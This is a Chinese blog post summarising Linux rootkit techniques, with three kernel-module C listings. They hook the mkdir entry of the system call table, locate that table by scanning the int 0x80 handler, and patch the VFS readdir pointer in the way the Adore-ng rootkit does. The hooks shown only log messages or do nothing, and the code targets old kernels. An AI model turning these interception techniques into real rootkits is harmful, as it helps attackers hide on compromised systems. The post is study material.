rootkit学习总结

发布于 2022-09-18 04:02:59 字数 9374 浏览 12 评论 0

rootkit的主要原理
     rootkit原理

  上面是网上随处可见的rootkit的一篇文章,抱着辩证的态度读之,N年前的东西了,有值得借鉴的也有out的东东了。
由于getdents64()是系统调用,所以要干预它,只能在内核中,通过驱动程序方式,在Linux下就是LKM方式。目前有两种方法来”干预”。

   1.Hook系统调用表(system call table)的getdents64调用项
先看个代码:

  1. #include <linux/module.h>
  2. #include <linux/kernel.h>
  3. #include <asm/unistd.h>
  4. #include <sys/syscall.h>
  5. #include <linux/types.h>
  6. #include <linux/dirent.h>
  7. #include <linux/string.h>
  8. #include <linux/fs.h>
  9. #include <linux/malloc.h>
  10. MODULE_LICENSE("GPL");
  11. extern void* sys_call_table[]; /*sys_call_table is exported, so we can accessit. But in some system this will cause problem */
  12. int (*orig_mkdir)(const char *path); /*the original systemcall*/
  13. int hacked_mkdir(const char *path)
  14. {
  15.         return 0; /*everything is ok, but he new systemcall   does nothing*/
  16. }
  17. int init_module(void) /*module setup*/
  18. {
  19.         orig_mkdir=sys_call_table[SYS_mkdir];
  20.         sys_call_table[SYS_mkdir]=hacked_mkdir;
  21.         return 0;
  22. }
  23. void cleanup_module(void) /*module shutdown*/
  24. {
  25.         sys_call_table[SYS_mkdir]=orig_mkdir;
  26. /*set mkdir syscall to the origal  one*/
  27. }

复制代码

上面的代码看看就行,看看过程!!!我也不知道在那里search到得了,用这种方法实现系统调用有个前提,就是系统必须导出sys_call_table内核符号,但是在2.6中,sys_call_table不再导出。也就是说模块中不能再通过简单的extern void *sys_call_table[];来获得系统调用表地址。所幸的是,即使内核不导出sys_call_table,也可以在内存中找到它的地址,下面是它的实现方法:

  1. #include <linux/kernel.h>
  2. #include <linux/module.h>
  3. #include <linux/init.h>
  4. #include <linux/sched.h>
  5. #include <asm/unistd.h>
  6. MODULE_LICENSE("GPL");
  7. unsigned long *sys_call_table=NULL;
  8. asmlinkage int (*orig_mkdir)(const char *,int);
  9. struct _idt
  10. {
  11.   unsigned short offset_low,segment_sel;
  12.   unsigned char reserved,flags;
  13.   unsigned short offset_high;
  14. };
  15. unsigned long *getscTable(){
  16.         unsigned char idtr[6],*shell,*sort;
  17.         struct _idt *idt;
  18.         unsigned long system_call,sct;
  19.         unsigned short offset_low,offset_high;
  20.         char *p;
  21.         int i;
  22.     /* get the interrupt descriptor table */
  23.     __asm__("sidt %0" : "=m" (idtr));
  24.         /* get the address of system_call */
  25.         idt=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
  26.         offset_low = idt->offset_low;
  27.         offset_high = idt->offset_high;
  28.         system_call=(offset_high<<16)|offset_low;
  29.        shell=(char *)system_call;
  30.         sort="\xff\x14\x85";
  31.    /* get the address of sys_call_table */
  32.         for(i=0;i<(100-2);i++)
  33.                 if(shell[i]==sort[0]&&shell[i+1]==sort[1]&&shell[i+2]==sort[2])
  34.                         break;
  35.         p=&shell[i];
  36.         p+=3;
  37.         sct=*(unsigned long*)p;
  38.         return (unsigned long*)(sct);
  39. }
  40. asmlinkage int hacked_mkdir(const char * pathname, int mode){
  41.         printk("PID %d called sys_mkdir !\n",current->pid);
  42.         return orig_mkdir(pathname,mode);
  43. }
  44. static int __init find_init(void){
  45.         sys_call_table = getscTable();
  46.         orig_mkdir=(int(*)(const char*,int))sys_call_table[__NR_mkdir];
  47.         sys_call_table[__NR_mkdir]=(unsigned long)hacked_mkdir;
  48.         return 0;
  49. }
  50. static void __exit find_cleanup(void){
  51.         sys_call_table[__NR_mkdir]=(unsigned long)orig_mkdir;
  52. }
  53. module_init(find_init);
  54. module_exit(find_cleanup);

复制代码

getscTable()是在内存中查找sys_call_table地址的函数。每一个系统调用都是通过int 0x80中断进入核心,中断描述符表把中断服务程序和中断向量对应起来。对于系统调用来说,操作系统会调用system_call中断服务程序。 system_call函数在系统调用表中根据系统调用号找到并调用相应的系统调用服务例程。idtr寄存器指向中断描述符表的起始地址,用 __asm__ ("sidt %0" : "=m" (idtr));指令得到中断描述符表起始地址,从这条指令中得到的指针可以获得int 0x80中断服描述符所在位置,然后计算出system_call函数的地址。反编译一下system_call函数可以看到在system_call函数内,是用call sys_call_table指令来调用系统调用函数的。
因此,只要找到system_call里的call sys_call_table(,eax,4)指令的机器指令就可以获得系统调用表的入口地址了。
这种hook系统调用表的方法在Linux rootkit中曾经流行一时,但现在已经成为过去式,因为反黑客软件通过检查系统调用表(与干净的该系统调用表的备份一比较)就能发现有黑客软件驻留。可以通过rkhunter和chkrootkit检查看看!!!

2. Adore-ng rootkit提供了一种新的方法。简单的说,就是通过修改vfs文件系统的函数跳转表来截获系统调用,这种方法不用借助于系统调用表。
通过修改VFS(Virtual File Switch)中的相关函数指针来实现隐藏文件这是比较新,也是让反黑客软件比较头痛的一种方法。所谓VFS是Linux在实际文件系统上抽象出的一个文件系统模型,而各个具体的文件系统,比如象ext3,vfat等,则是VFS这个抽象类的子类,这个我也不是很懂。
Adore-ng rootkit提供了一种新的方法。简单的说,就是通过修改vfs文件系统的函数跳转表来截获系统调用,这种方法不用借助于系统调用表。下篇文章我讲分析下Adore-ng源码.
下面是它的实现方法:

  1. #include <linux/sched.h>
  2. #include <linux/module.h>
  3. #include <linux/kernel.h>
  4. #include <linux/init.h>
  5. #include <linux/fs.h>
  6. #include <linux/file.h>
  7. MODULE_LICENSE("GPL");
  8. char *root_fs="/";
  9. typedef int (*readdir_t)(struct file *,void *,filldir_t);
  10. readdir_t orig_root_readdir=NULL;
  11. int myreaddir(struct file *fp,void *buf,filldir_t filldir)
  12. {
  13.         int r;
  14.         printk("<1>You got me partner!\n");
  15.         r=orig_root_readdir(fp,buf,filldir);
  16.         return r;
  17. }
  18. int patch_vfs(const char *p,readdir_t *orig_readdir,readdir_t new_readdir)
  19. {
  20.         struct file *filep;
  21.         filep=filp_open(p,O_RDONLY,0);
  22.         if(IS_ERR(filep))
  23.                 return -1;
  24.         if(orig_readdir)
  25.                 *orig_readdir=filep->f_op->readdir;
  26.         filep->f_op->readdir=new_readdir;
  27.         filp_close(filep,0);
  28.         return 0;
  29. }
  30. int unpatch_vfs(const char *p,readdir_t orig_readdir)
  31. {
  32.         struct file *filep;
  33.         filep=filp_open(p,O_RDONLY,0);
  34.         if(IS_ERR(filep))
  35.                 return -1;
  36.         filep->f_op->readdir=orig_readdir;
  37.         filp_close(filep,0);
  38.         return 0;
  39. }
  40. static int patch_init(void)
  41. {
  42.         patch_vfs(root_fs,&orig_root_readdir,myreaddir);
  43.         printk("<1>VFS is patched!\n");
  44.         return 0;
  45. }
  46. static void patch_cleanup(void)
  47. {
  48.         unpatch_vfs(root_fs,orig_root_readdir);
  49.         printk("<1>VFS is unpatched!\n");
  50. }
  51. module_init(patch_init);
  52. module_exit(patch_cleanup);

复制代码

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文